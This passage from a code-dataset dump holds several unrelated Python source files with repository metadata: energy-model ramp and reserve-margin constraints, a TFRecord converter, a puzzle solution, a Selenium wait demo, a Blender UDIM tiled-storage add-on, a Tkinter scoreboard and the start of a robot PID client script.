\n:math:`\\textbf{T}^{ramp}`. We assume for simplicity the rate limits for both \nramp up and down are equal and they do not vary with technology vintage. The \nramp rate limits (:math:`r_t`) for technology :math:`t` should be expressed in \npercentage of its rated capacity.\n\nNote that when :math:`d_{nd}` is the last time-of-day, :math:`d_{nd + 1} \\not \\in \n\\textbf{D}`, i.e., if one time slice is the last time-of-day in a season and the \nother time slice is the first time-of-day in the next season, the ramp rate \nlimits between these two time slices can not be expressed by :eq:`ramp_up_day`. \nTherefore, the ramp rate constraints between two adjacent seasons are \nrepresented in :eq:`ramp_up_season`. \n\nIn Equation :eq:`ramp_up_day` and :eq:`ramp_up_season`, we assume \n:math:`\\textbf{S} = \\{s_i, i = 1, 2, \\cdots, ns\\}` and \n:math:`\\textbf{D} = \\{d_i, i=1, 2, \\cdots, nd\\}`.\n\n.. 
math::\n \\frac{ \n \\textbf{ACT}_{p, s, d_{i + 1}, t, v} \n }{\n SEG_{s, d_{i + 1}} \\cdot C2A_t \n }\n -\n \\frac{ \n \\textbf{ACT}_{p, s, d_i, t, v} \n }{\n SEG_{s, d_i} \\cdot C2A_t \n }\n \\leq\n r_t \\cdot \\textbf{CAPAVL}_{p,t}\n \\\\\n \\forall \n p \\in \\textbf{P}^o,\n s \\in \\textbf{S},\n d_i, d_{i + 1} \\in \\textbf{D},\n t \\in \\textbf{T}^{ramp},\n v \\in \\textbf{V}\n :label: ramp_up_day\n\"\"\"\n if d != M.time_of_day.first():\n d_prev = M.time_of_day.prev(d)\n expr_left = (\n M.V_Activity[p, s, d, t, v] / value(M.SegFrac[s, d]) -\n M.V_Activity[p, s, d_prev, t, v] / value(M.SegFrac[s, d_prev])\n ) / value(M.CapacityToActivity[t])\n expr_right = M.V_Capacity[t, v] * value(M.RampUp[t])\n expr = (expr_left <= expr_right)\n else:\n return Constraint.Skip\n\n return expr\n\n\ndef RampUpSeason_Constraint(M, p, s, t, v):\n r\"\"\"\nNote that :math:`d_1` and :math:`d_{nd}` represent the first and last time-of-day, \nrespectively.\n\n.. math::\n \\frac{ \n \\textbf{ACT}_{p, s_{i + 1}, d_1, t, v} \n }{\n SEG_{s_{i + 1}, d_1} \\cdot C2A_t \n }\n -\n \\frac{ \n \\textbf{ACT}_{p, s_i, d_{nd}, t, v} \n }{\n SEG_{s_i, d_{nd}} \\cdot C2A_t \n }\n \\leq\n r_t \\cdot \\textbf{CAPAVL}_{p,t}\n \\\\\n \\forall \n p \\in \\textbf{P}^o,\n s_i, s_{i + 1} \\in \\textbf{S},\n d_1, d_{nd} \\in \\textbf{D},\n t \\in \\textbf{T}^{ramp},\n v \\in \\textbf{V}\n :label: ramp_up_season\n\"\"\"\n if s != M.time_season.first():\n s_prev = M.time_season.prev(s)\n d_first = M.time_of_day.first()\n d_last = M.time_of_day.last()\n expr_left = (\n M.V_Activity[p, s, d_first, t, v] / M.SegFrac[s, d_first] -\n M.V_Activity[p, s_prev, d_last, t, v] / M.SegFrac[s_prev, d_last]\n ) / value(M.CapacityToActivity[t])\n expr_right = M.V_Capacity[t, v] * value(M.RampUp[t])\n expr = (expr_left <= expr_right)\n else:\n return Constraint.Skip\n\n return expr\n\n\ndef RampUpPeriod_Constraint(M, p, t, v):\n # if p != M.time_future.first():\n # \tp_prev = M.time_future.prev(p)\n # \ts_first = M.time_season.first()\n # \ts_last = M.time_season.last()\n # \td_first = M.time_of_day.first()\n # \td_last = M.time_of_day.last()\n # \texpr_left = (\n # \t\tM.V_Activity[ p, s_first, d_first, t, v ] -\n # \t\tM.V_Activity[ p_prev, s_last, d_last, t, v ]\n # \t\t)\n # \texpr_right = (\n # \t\tM.V_Capacity[t, v]*\n # \t\tvalue( M.RampUp[t] )*\n # \t\tvalue( M.CapacityToActivity[ t ] )*\n # \t\tvalue( M.SegFrac[s, d])\n # \t\t)\n # \texpr = (expr_left <= expr_right)\n # else:\n # \treturn Constraint.Skip\n\n # return expr\n\n return Constraint.Skip # We don't need inter-period ramp up/down constraint.\n\n\ndef RampDownDay_Constraint(M, p, s, d, t, v):\n r\"\"\"\nSimilar to Equation :eq:`ramp_up_day` and :eq:`ramp_up_season`, we use Equation\n:eq:`ramp_down_day` and :eq:`ramp_down_season` to limit ramp down rates between \nany two adjacent time slices.\n\n.. 
math::\n \\frac{ \n \\textbf{ACT}_{p, s, d_{i + 1}, t, v} \n }{\n SEG_{s, d_{i + 1}} \\cdot C2A_t \n }\n -\n \\frac{ \n \\textbf{ACT}_{p, s, d_i, t, v} \n }{\n SEG_{s, d_i} \\cdot C2A_t \n }\n \\geq\n -r_t \\cdot \\textbf{CAPAVL}_{p,t}\n \\\\\n \\forall \n p \\in \\textbf{P}^o,\n s \\in \\textbf{S},\n d_i, d_{i + 1} \\in \\textbf{D},\n t \\in \\textbf{T}^{ramp},\n v \\in \\textbf{V}\n :label: ramp_down_day\n\"\"\"\n\n if d != M.time_of_day.first():\n d_prev = M.time_of_day.prev(d)\n expr_left = (\n M.V_Activity[p, s, d, t, v] / value(M.SegFrac[s, d]) -\n M.V_Activity[p, s, d_prev, t, v] / value(M.SegFrac[s, d_prev])\n ) / value(M.CapacityToActivity[t])\n expr_right = -(M.V_Capacity[t, v] * value(M.RampDown[t]))\n expr = (expr_left >= expr_right)\n else:\n return Constraint.Skip\n\n return expr\n\n\ndef RampDownSeason_Constraint(M, p, s, t, v):\n r\"\"\"\n.. math::\n \\frac{ \n \\textbf{ACT}_{p, s_{i + 1}, d_1, t, v} \n }{\n SEG_{s_{i + 1}, d_1} \\cdot C2A_t \n }\n -\n \\frac{ \n \\textbf{ACT}_{p, s_i, d_{nd}, t, v} \n }{\n SEG_{s_i, d_{nd}} \\cdot C2A_t \n }\n \\geq\n -r_t \\cdot \\textbf{CAPAVL}_{p,t}\n \\\\\n \\forall \n p \\in \\textbf{P}^o,\n s_i, s_{i + 1} \\in \\textbf{S},\n d_1, d_{nd} \\in \\textbf{D},\n t \\in \\textbf{T}^{ramp},\n v \\in \\textbf{V}\n :label: ramp_down_season\n\"\"\"\n if s != M.time_season.first():\n s_prev = M.time_season.prev(s)\n d_first = M.time_of_day.first()\n d_last = M.time_of_day.last()\n expr_left = (\n M.V_Activity[p, s, d_first, t, v] /\n value(\n M.SegFrac[s, d_first]\n ) -\n M.V_Activity[p, s_prev, d_last, t, v] /\n value(\n M.SegFrac[s_prev, d_last]\n )\n ) / value(M.CapacityToActivity[t])\n expr_right = -(M.V_Capacity[t, v] * value(M.RampDown[t]))\n expr = (expr_left >= expr_right)\n else:\n return Constraint.Skip\n\n return expr\n\n\ndef RampDownPeriod_Constraint(M, p, t, v):\n # if p != M.time_future.first():\n # \tp_prev = M.time_future.prev(p)\n # \ts_first = M.time_season.first()\n # \ts_last = M.time_season.last()\n # \td_first = M.time_of_day.first()\n # \td_last = M.time_of_day.last()\n # \texpr_left = (\n # \t\tM.V_Activity[ p, s_first, d_first, t, v ] -\n # \t\tM.V_Activity[ p_prev, s_last, d_last, t, v ]\n # \t\t)\n # \texpr_right = (\n # \t\t-1*\n # \t\tM.V_Capacity[t, v]*\n # \t\tvalue( M.RampDown[t] )*\n # \t\tvalue( M.CapacityToActivity[ t ] )*\n # \t\tvalue( M.SegFrac[s, d])\n # \t\t)\n # \texpr = (expr_left >= expr_right)\n # else:\n # \treturn Constraint.Skip\n\n # return expr\n\n return Constraint.Skip # We don't need inter-period ramp up/down constraint.\n\n\ndef ReserveMargin_Constraint(M, p, g, s, d):\n r\"\"\"\nTo assure system reliability of power grid, during each period :math:`p`, the\nsum of available capacity of all reserve technologies (defined by set :math:`\\textbf{T}^{res}`)\n:math:`\\sum_{t \\in T^{res}} \\textbf{CAPAVL}_{p,t}`, should not exceed the peak\nload plus a reserve margin :math:`RES_c`. Note reserve margin is typically\nexpressed in the form of percentage. In Equation :eq:`reserve_margin`, we use \n:math:`(s^*,d^*)` to represent the peak-load time slice.\n\n.. 
math::\n \\sum_{t \\in T^{res}} {\n CC_t \\cdot\n \\textbf{CAPAVL}_{p,t} \\cdot\n SEG_{s^*,d^*} \\cdot C2A_t }\n \\geq\n DEM_{p,c} \\cdot\n DSD_{s^*, d^*, c} \\cdot\n (1 + RES_c)\n \\\\\n \\forall\n p \\in \\textbf{P}^o,\n c \\in \\textbf{C}^{res}\n :label: reserve_margin\n\"\"\"\n # The season and time-of-day of the slice with the maximum average load.\n PowerTechs = set() # all the power generation technologies\n PowerCommodities = set() # it consists of all the commodities coming out of powerplants: ELCP, ELCP_Renewables, ELCP_SOL\n for i in M.ReserveMargin.sparse_keys():\n if i[1] == g:\n PowerCommodities.add(i[0])\n\n if not PowerCommodities:\n return Constraint.Skip\n\n for i, t, v, o in M.Efficiency:\n if o in PowerCommodities:\n PowerTechs.add(t)\n\n expr_left = sum(value(M.CapacityCredit[t]) *\n M.V_CapacityAvailableByPeriodAndTech[p, t] *\n value(M.CapacityToActivity[t]) *\n value(M.SegFrac[s, d])\n for t in PowerTechs if (p,\n t) in M.CapacityAvailableVar_pt) # M.CapacityAvailableVar_pt check if all the possible consistent combinations of t and p\n\n total_generation = sum(M.V_Activity[p, s, d, t, S_v]\n for t in PowerTechs\n for S_v in M.ProcessVintages(p, t))\n\n expr_right = total_generation * (1 + M.ReserveMargin[PowerCommodities.pop()])\n\n return (expr_left >= expr_right)\n\n# End additional and derived (informational) variable constraints\n##############################################################################\n\n# End *_rule definitions\n##############################################################################\n\n","repo_name":"EnergyModels/temoatools","sub_path":"temoa_stochastic/temoa_model/temoa_rules.py","file_name":"temoa_rules.py","file_ext":"py","file_size_in_byte":58109,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"94"} +{"seq_id":"30800284557","text":"# https://github.com/tensorflow/tensorflow/issues/9675\n# https://github.com/Hvass-Labs/TensorFlow-Tutorials/blob/master/18_TFRecords_Dataset_API.ipynb\n\nimport argparse\nimport sys\n\nimport pandas as pd\nimport tensorflow as tf\n\n\ndef wrap_int64(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef wrap_float(value):\n return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))\n\n\ndef wrap_bytes(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef print_progress(count, total):\n # Percentage completion.\n pct_complete = float(count) / total\n\n # Status-message.\n # Note the \\r which means the line should overwrite itself.\n msg = \"\\r- Progress: {0:.1%}\".format(pct_complete)\n\n # Print it.\n sys.stdout.write(msg)\n sys.stdout.flush()\n\n\ndef convert_to_tfrecord(prev_img_paths, curr_img_paths, out_path, categories, speeds):\n # Args:\n # image_paths List of file-paths for the train_images.\n # labels Class-labels for the train_images.\n # out_path File-path for the TFRecords output file.\n\n print(\"\\nCreating: \" + out_path)\n\n # Number of train_images. 
Used when printing the progress.\n num_images = len(prev_img_paths)\n\n # Open a TFRecordWriter for the output-file.\n with tf.python_io.TFRecordWriter(out_path) as writer:\n # Iterate over all the image-paths and class-labels.\n for i, (prev_img_path, curr_img_path, category, speed) in enumerate(zip(prev_img_paths,\n curr_img_paths,\n categories,\n speeds)):\n # Print the percentage-progress.\n print_progress(count=i, total=num_images - 1)\n\n prev_img_bytes = open(prev_img_path, 'rb').read()\n curr_img_bytes = open(curr_img_path, 'rb').read()\n # Create a dict with the data we want to save in the\n # TFRecords file. You can add more relevant data here.\n data = \\\n {\n 'prev_img': wrap_bytes(prev_img_bytes),\n 'curr_img': wrap_bytes(curr_img_bytes),\n }\n\n if category is not None:\n data['category'] = wrap_int64(int(category))\n data['speed'] = wrap_float(float(speed))\n\n # Wrap the data as TensorFlow Features.\n feature = tf.train.Features(feature=data)\n\n # Wrap again as a TensorFlow Example.\n example = tf.train.Example(features=feature)\n\n # Serialize the data.\n serialized = example.SerializeToString()\n\n # Write the serialized data to the TFRecords file.\n writer.write(serialized)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Convert csv training file into tfrecord files.')\n parser.add_argument('--input_filename', type=str, default='data/labeled_csv/train/train_shard_0.csv',\n help='file to be converted into a tfrecord')\n parser.add_argument('--output_filename', type=str, default='data/tfrecords/train/shard_0.tfrecord',\n help='file location for tfrecord')\n args = parser.parse_args()\n\n file, out = args.input_filename, args.output_filename\n data = pd.read_csv(file)\n length = data.shape[0]\n width = data.shape[-1]\n\n convert_to_tfrecord(prev_img_paths=data.prev_img,\n curr_img_paths=data.curr_img,\n out_path=out,\n speeds=data.speed if width > 2 else [None] * length,\n categories=data.category if width > 2 else [None] * length)\n","repo_name":"nunezpaul/speedchallenge","sub_path":"convert_images_to_tfrecord.py","file_name":"convert_images_to_tfrecord.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"}
{"seq_id":"12069749995","text":"#ABCDEFGHIJKLMNOPQRSTUVWXYZ\ndef solution(name):\n answer = 0\n \n check = len(name) - 1\n \n \n for i, a in enumerate(name):\n answer += min(ord(a) - ord('A'), ord('Z') - ord(a) + 1)\n \n next = i + 1\n while next < len(name) and name[next] == 'A':\n next += 1\n \n check = min([check, 2 * i + len(name) - next, i + 2 * (len(name) - next)])\n \n answer += check\n return answer","repo_name":"KimSeungHyun1217/Algorithm","sub_path":"programmers/조이스틱#42860.py","file_name":"조이스틱#42860.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
{"seq_id":"31952312162","text":"'''\r\n    Example of implicit and explicit waits\r\n'''\r\nimport time\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\n\r\noptions = webdriver.ChromeOptions()\r\n# Set the page load strategy\r\noptions.page_load_strategy = 'eager'\r\n# options.add_argument('start-maximized')\r\noptions.add_experimental_option('useAutomationExtension', False)\r\noptions.add_experimental_option('excludeSwitches', ['enable-automation', 'enable-logging'])\r\n# Disable the save-username/password popup\r\nprefs = dict()\r\nprefs[\"credentials_enable_service\"] = False\r\nprefs['profile.password_manager_enable'] = 
False\r\noptions.add_experimental_option(\"prefs\", prefs)\r\ndriver = webdriver.Chrome(options=options)\r\n\r\ndriver.execute_cdp_cmd(\"Page.addScriptToEvaluateOnNewDocument\", {\r\n \"source\": \"\"\"\r\n Object.defineProperty(navigator, 'webdriver', {\r\n get: () => false\r\n })\r\n \"\"\"\r\n})\r\n# driver = webdriver.Chrome()\r\n# Implicit wait: wait for at most 5 seconds.\r\ndriver.implicitly_wait(5)\r\ntime.sleep(5)\r\ndriver.get('http://39.98.138.157/shopxo/index.php')\r\n\r\ndriver.find_element('name', 'wd').send_keys('手机')\r\n# driver.get('http://www.baidu.com')\r\n# Explicit wait: wait until the kw element is displayed, then continue with the subsequent steps.\r\n# driver.find_element('id', 'kw').send_keys('虚竹')\r\n# driver.find_element('id', 'su').click()\r\n# Ignores all logic: once execution reaches this line it is forced to wait for 5 seconds.\r\n# time.sleep(0.2)\r\n# Explicitly wait for the specified element: the maximum wait time is 10 seconds, checking every 0.5 seconds until the element is found; if it is not found, the message content is shown and a TimeoutException is raised.\r\nel = WebDriverWait(driver, 2, 0.5).until(lambda el1: driver.find_element('xpath', '//*[@id=\"1\"]/div/div/h3/asda'),\r\n                                         message='explicit wait failed')\r\ntemp = WebDriverWait(driver, 10, 0.5).until_not(lambda el: driver.find_element('xpath', '//*[@id=\"1\"]/div/div/h3/a'),\r\n                                                message='explicit wait failed')\r\n\r\n# el.click()\r\n\r\n# print(temp)\r\n# driver.quit()\r\n","repo_name":"hoodligan/python","sub_path":"Python_Selenium/class04_wait/wait.py","file_name":"wait.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
{"seq_id":"70798020150","text":"# SPDX-License-Identifier: GPL-2.0-or-later\n\nimport os\nimport warnings\n\nfrom typing import Collection, Set\n\nimport bpy\n\nfrom bpy.props import PointerProperty\nfrom bpy.types import Image\n\nfrom . import utils\nfrom .utils.image import save_image_copy\nfrom .utils.layer_stack_utils import get_layer_stack_from_prop\n\n\nclass TiledStorage(bpy.types.PropertyGroup):\n    \"\"\"Store copies of images as the tiles of a UDIM image. Can be used\n    if the fragment shader's texture limit is reached since the tiles\n    of a UDIM use the same sampler.\n    The image copies are stored on disk in Blender's temporary folder\n    and are not saved with the .blend file.\n    An instance's initialize method must be called before use.\n    \"\"\"\n    udim_image: PointerProperty(\n        type=bpy.types.Image,\n        name=\"Tiled Image\"\n    )\n\n    def __bool__(self):\n        return self.is_initialized\n\n    def __contains__(self, image: Image):\n        if not self.is_initialized:\n            return False\n        return next((True for x in self.tiles.values() if x is image), False)\n\n    def initialize(self, is_data) -> None:\n        \"\"\"Initialize this instance and set whether it is for sRGB or\n        non-color images.\n        \"\"\"\n        self[\"is_data\"] = bool(is_data)\n\n        layer_stack = self.layer_stack\n        if layer_stack is None:\n            raise RuntimeError(\"Cannot find layer stack.\")\n\n        self.udim_image = self._init_image()\n\n        self[\"tiles\"] = {}\n\n    def _init_image(self) -> bpy.types.Image:\n        layer_stack = self.layer_stack\n\n        name_suffix = 'data' if self.is_data else 'srgb'\n        name = f\".pml_{layer_stack.identifier}_tiled_storage_{name_suffix}\"\n\n        image = bpy.data.images.new(name, 32, 32, alpha=False,\n                                    float_buffer=self.is_data,\n                                    is_data=self.is_data,\n                                    tiled=True)\n        filename = f\"{name}.<UDIM>.exr\"\n        image.file_format = 'OPEN_EXR'\n        image.filepath_raw = os.path.join(bpy.app.tempdir, filename)\n        image.use_half_precision = True\n        return image\n\n    def delete(self) -> None:\n        \"\"\"Removes all tiles. 
Deleting all image copies.\n Does nothing if the instance has not been initialized.\n \"\"\"\n if not self.is_initialized:\n return\n\n numbers = [int(x) for x in self.tiles.keys()]\n for num in numbers:\n # This deletes the file on disk as well\n self.remove_image_by_number(num)\n\n bpy.data.images.remove(self.udim_image)\n\n def add_image(self, image: Image) -> int:\n \"\"\"Stores a copy of image as a UDIM tile. The image source must\n be 'GENERATED' or 'FILE'. Returns the tile number the image was\n added as.\n \"\"\"\n if image.source not in ('GENERATED', 'FILE'):\n raise ValueError(\"image source must be in {'GENERATED', 'FILE'}\")\n\n number: int = self._next_free_number\n\n self.tiles[str(number)] = image\n\n self._save_image_as_tile(image, number)\n\n return number\n\n def get_image_tile_num(self, image: Image) -> int:\n \"\"\"Returns the tile number that image is saved as. Raises a\n ValueError if the image cannot be found.\n \"\"\"\n for num_str, tile_image in self.tiles.items():\n if tile_image is image:\n return int(num_str)\n raise ValueError(\"image not found in tiles\")\n\n def remove_image(self, image: Image) -> None:\n \"\"\"Removes the tile containing a copy of image. Raises a\n ValueError if the image cannot be found.\"\"\"\n number = self.get_image_tile_num(image)\n\n self.remove_image_by_number(number)\n\n def remove_image_by_number(self, number: int) -> None:\n \"\"\"Deletes the UDIM tile given by number.\"\"\"\n del self.tiles[str(number)]\n self._delete_tile_file(number)\n\n if number == 1001:\n # Keep a generated (float) image for the first tile\n # (prevents reloading images as 8-bit)\n self._gen_default_first_tile()\n else:\n # Remove the tile from the UDIM image\n tile = self.udim_image.tiles.get(number)\n if tile is not None:\n self.udim_image.tiles.remove(tile)\n\n def rewrite_image(self, image: Image) -> None:\n \"\"\"Writes image to disk as a UDIM tile.\"\"\"\n number = self.get_image_tile_num(image)\n\n self._save_image_as_tile(image, number)\n\n def update_from(self, images: Collection[Image]) -> None:\n \"\"\"Adds copies of all images in images as UDIM tiles or updates\n the copies of any that have already been added. Any images with\n incompatible colorspaces are ignored. Also removes any tiles\n for which the images are no longer valid (e.g. if they have\n been deleted).\n \"\"\"\n is_srgb = not self.is_data\n\n self._clear_invalid_tiles()\n\n # Images that already have a tile assigned\n existing = set(self.tiles.values())\n\n # Filter out images with incorrect colorspaces\n images = {x for x in images\n if (x.colorspace_settings.name == \"sRGB\") == is_srgb}\n\n for img in images:\n if img in existing:\n try:\n self.rewrite_image(img)\n except ValueError as e:\n warnings.warn(str(e))\n else:\n self.add_image(img)\n if images:\n self.reload()\n\n def on_load(self) -> None:\n \"\"\"Called after a .blend file is loaded. Does nothing if the\n TiledStorage has not been initialized.\n \"\"\"\n if not self.is_initialized:\n return\n\n # Set the filepath of the UDIM to be in the new tempdir\n filename = os.path.basename(self.udim_image.filepath_raw)\n self.udim_image.filepath_raw = os.path.join(bpy.app.tempdir, filename)\n\n self._clear_invalid_tiles()\n\n # Rewrite all images to disk\n for img in self.tiles.values():\n self.rewrite_image(img)\n\n def reload(self) -> None:\n \"\"\"Reloads all tiles from disk.\"\"\"\n self.udim_image.reload()\n\n def _clear_invalid_tiles(self) -> None:\n \"\"\"Deletes all tiles that no longer have a valid image (e.g. 
if\n the image has been deleted).\n \"\"\"\n tiles = self.tiles\n invalid = [num for num, img in tiles.items() if img is None]\n for num in invalid:\n self.remove_image_by_number(int(num))\n\n def _get_filepath(self, number: int) -> str:\n \"\"\"Returns the filepath of the UDIM tile with the given number.\"\"\"\n return self.udim_image.filepath_raw.replace(\"<UDIM>\", str(number))\n\n def _delete_tile_file(self, number: int) -> None:\n filepath = self._get_filepath(number)\n\n # Do nothing if no file exists\n if not os.path.exists(filepath):\n return\n\n # Only delete files in Blender's temp dir\n if bpy.path.is_subdir(filepath, bpy.app.tempdir):\n try:\n os.remove(filepath)\n except IOError as e:\n warnings.warn(f\"Could not delete {filepath}: {e}\")\n else:\n warnings.warn(f\"File {filepath} is not in this blend file's \"\n \"temporary directory.\")\n\n def _save_image_as_tile(self, image: Image, number: int) -> None:\n \"\"\"Saves image to disk as the UDIM tile given by number.\"\"\"\n # N.B. Need to save first tile as float, otherwise Blender will\n # load all tiles as int\n if self.is_srgb:\n fmt = 'PNG'\n else:\n fmt = ('OPEN_EXR'\n if image.is_float or number == 1001\n else 'PNG')\n save_image_copy(image,\n self._get_filepath(number),\n image_format=fmt)\n\n def _gen_default_first_tile(self, number=1001) -> None:\n op_caller = utils.ops.OpCaller(bpy.context, edit_image=self.udim_image)\n\n op_kwargs = {\"width\": 32,\n \"height\": 32,\n \"float\": not self.is_srgb,\n \"alpha\": False}\n\n tile = self.udim_image.tiles.get(number)\n if tile is None:\n op_caller.call(bpy.ops.image.tile_add, number=number, **op_kwargs)\n else:\n self.udim_image.tiles.active = tile\n op_caller.call(bpy.ops.image.tile_fill, **op_kwargs)\n\n @property\n def is_data(self) -> bool:\n \"\"\"True if this TiledStorage is for non-color data, False if\n this TiledStorage is for sRGB data.\"\"\"\n return self[\"is_data\"]\n\n @property\n def is_srgb(self) -> bool:\n \"\"\"True if this TiledStorage is for sRGB data.\"\"\"\n return not self[\"is_data\"]\n\n @property\n def is_initialized(self) -> bool:\n return self.udim_image is not None\n\n @property\n def image_manager(self):\n return self.layer_stack.image_manager\n\n @property\n def layer_stack(self):\n return get_layer_stack_from_prop(self)\n\n @property\n def _next_free_number(self) -> int:\n \"\"\"The number of the lowest available UDIM tile.\"\"\"\n existing: Set[str] = set(self.tiles.keys())\n for x in range(1001, 2000):\n if str(x) not in existing:\n return x\n raise RuntimeError(\"Cannot find free tile between 1001 and 2000\")\n\n @property\n def tiles(self):\n \"\"\"Returns a map of UDIM tile numbers (as strings) to the image\n that the tile contains a copy of.\n \"\"\"\n try:\n return self[\"tiles\"]\n except KeyError:\n self[\"tiles\"] = {}\n return self[\"tiles\"]\n\n\ndef add_tiled_helper_nodes(img_node: bpy.types.ShaderNodeTexImage,\n tile_num: int,\n uv_map_name: str) -> None:\n \"\"\"Adds nodes to map input of img_node to UDIM tile index\n tile_num.\n \"\"\"\n node_tree = img_node.id_data\n\n # Node to translate UV coords onto the correct UDIM tile\n uv_shift = node_tree.nodes.new(\"ShaderNodeVectorMath\")\n uv_shift.name = f\".pml_tiled_storage.{uv_shift.name}\"\n uv_shift.label = f\"{img_node.label} Map UVs\"\n uv_shift.operation = 'ADD'\n uv_shift.parent = img_node.parent\n uv_shift.location = (img_node.location.x - 200, img_node.location.y)\n uv_shift.width = 120\n uv_shift.hide = True\n\n # Set the value of the second input of the Vector Math 
node\n shift_vec = uv_shift.inputs[1].default_value\n shift_vec[0] = (tile_num - 1) % 10 # x coord of the UDIM tile\n shift_vec[1] = (tile_num - 1001) // 10 # y coord of the UDIM tile\n\n uv_map = node_tree.nodes.new(\"ShaderNodeUVMap\")\n uv_map.name = f\".pml_tiled_storage.{uv_map.name}\"\n uv_map.parent = img_node.parent\n uv_map.location = (uv_shift.location.x - 200, uv_shift.location.y)\n uv_map.uv_map = uv_map_name\n uv_map.hide = True\n\n node_tree.links.new(img_node.inputs[0], uv_shift.outputs[0])\n node_tree.links.new(uv_shift.inputs[0], uv_map.outputs[0])\n\n\ndef remove_tiled_helper_nodes(img_node: bpy.types.ShaderNodeTexImage) -> None:\n nodes = img_node.id_data.nodes\n\n if not img_node.inputs[0].is_linked:\n return\n\n shift_node = img_node.inputs[0].links[0].from_node\n if not shift_node.name.startswith(\".pml_tiled_storage\"):\n return\n\n if shift_node.inputs[0].is_linked:\n uv_map = shift_node.inputs[0].links[0].from_node\n if uv_map.name.startswith(\".pml_tiled_storage\"):\n nodes.remove(uv_map)\n nodes.remove(shift_node)\n\n\ndef add_nodes_to_tiled_storage(layer_stack,\n *nodes: bpy.types.ShaderNodeTexImage\n ) -> None:\n nodes = [x for x in nodes\n if isinstance(x, bpy.types.ShaderNodeTexImage)\n and x.image is not None\n and x.image.source in ('FILE', 'GENERATED')]\n\n im = layer_stack.image_manager\n\n images = set(x.image for x in nodes)\n im.update_tiled_storage(images)\n\n for node in nodes:\n tiled_storage, tile_num = im.find_in_tiled_storage(node.image)\n if tiled_storage is None:\n continue\n\n node.label = node.image.name\n node[\"pml_tiled_storage_old_image\"] = node.image\n\n node.image = tiled_storage.udim_image\n node.hide = True\n\n add_tiled_helper_nodes(node, tile_num, layer_stack.uv_map_name)\n\n\ndef remove_from_tiled_storage(layer_stack,\n *nodes: bpy.types.ShaderNodeTexImage) -> None:\n im = layer_stack.image_manager\n\n nodes = {x for x in nodes\n if is_tiled_storage_node(x)}\n\n for node in nodes:\n old_img = node[\"pml_tiled_storage_old_image\"]\n im.remove_from_tiled_storage(old_img)\n\n node.image = old_img\n del node[\"pml_tiled_storage_old_image\"]\n\n remove_tiled_helper_nodes(node)\n\n\ndef is_tiled_storage_node(node: bpy.types.ShaderNodeTexImage) -> bool:\n \"\"\"Returns True if an Image Texture is set-up to refer to a tile\n of a TiledStorage instance.\n \"\"\"\n return \"pml_tiled_storage_old_image\" in node\n\n\ndef tiled_storage_enabled(layer_stack) -> bool:\n \"\"\"Returns True if layer_stack currently uses tiled storage.\"\"\"\n return layer_stack.image_manager.uses_tiled_storage\n\n\ndef register():\n bpy.utils.register_class(TiledStorage)\n\n\ndef unregister():\n bpy.utils.unregister_class(TiledStorage)\n","repo_name":"avelgest/principled-material-layers","sub_path":"principled_material_layers/tiled_storage.py","file_name":"tiled_storage.py","file_ext":"py","file_size_in_byte":13414,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"94"} +{"seq_id":"33849816588","text":"from tkinter import *\r\nimport pickle\r\n\r\nlist = []\r\nwith open('Snakescore.txt','rb') as scb:\r\n l = pickle.load(scb)\r\n \r\n list.append(l)\r\n\r\nwith open('Collectscore.txt','rb') as cscb:\r\n m = pickle.load(cscb)\r\n \r\n list.append(m)\r\n\r\nwith open('GTNscore.txt','rb') as Gscb:\r\n n = pickle.load(Gscb)\r\n \r\n \r\n list.append(n)\r\n\r\n\r\nwith open('TILEscore.txt','rb') as Tscb:\r\n o = pickle.load(Tscb)\r\n \r\n list.append(o)\r\n\r\n\r\n\r\nroot = Tk()\r\nroot.title(\"SCORE 
BOARD\")\r\nroot.configure(bg='black')\r\nroot.geometry('400x400')\r\nroot.iconbitmap(\"C:\\\\JL\\\\Justice_League_dc_comic_logo_movie-512.ico\")\r\ntitle = Label(root, text='SCORE BOARD', font=('Fixedsys', 35, 'normal'), fg='white', bg='black').pack()\r\nGtn = Label(root, text='Guess the Number : {}'.format(n['GTN']), font=('Fixedsys', 15, 'normal'), fg='white', bg='black')\r\nGtn.place(x = 80, y = 120)\r\ntiles = Label(root, text='Tiles : {}'.format(o['TILES']), font=('Fixedsys', 15, 'normal'), fg='white', bg='black')\r\ntiles.place(x = 80, y = 170)\r\nSnake = Label(root, text='Snake : {}'.format(l['snake']), font=('Fixedsys', 15, 'normal'), fg='white', bg='black')\r\nSnake.place(x = 80, y = 220)\r\nCollector = Label(root, text='Collector : {}'.format(m['Collector']), font=('Fixedsys', 15, 'normal'), fg='white', bg='black')\r\nCollector.place(x = 80, y = 270)\r\n \r\n\r\nroot.mainloop()","repo_name":"suraj7026/Arcade-JL","sub_path":"Scoreboard.py","file_name":"Scoreboard.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"22972938829","text":"import numpy as np\nimport time\nimport threading\nfrom snifferpy import RobotClient, CommandType\nimport matplotlib.pyplot as plt\n\n\nif __name__ == '__main__':\n cli = RobotClient(host='10.0.0.11', port=8080)\n\n kp_left = 0.0\n ki_left = 1.0\n kd_left = 0.0\n tau_left = 0.0\n kp_right = 0.0\n ki_right = 1.0\n kd_right = 0.0\n tau_right = 0.0\n v_left = np.hstack((np.zeros(2), 200 * np.ones(5), np.zeros(5)))\n v_right = np.hstack((np.zeros(2), -200 * np.ones(5), np.zeros(5)))\n\n cli.connect()\n\n cli.set_setpoints(setpoints_type=CommandType.PID_LEFT,\n setpoints=np.array([[kp_left, ki_left, kd_left, tau_left]]))\n cli.talk()\n\n cli.set_setpoints(setpoints_type=CommandType.PID_RIGHT,\n setpoints=np.array([[kp_right, ki_right, kd_right, 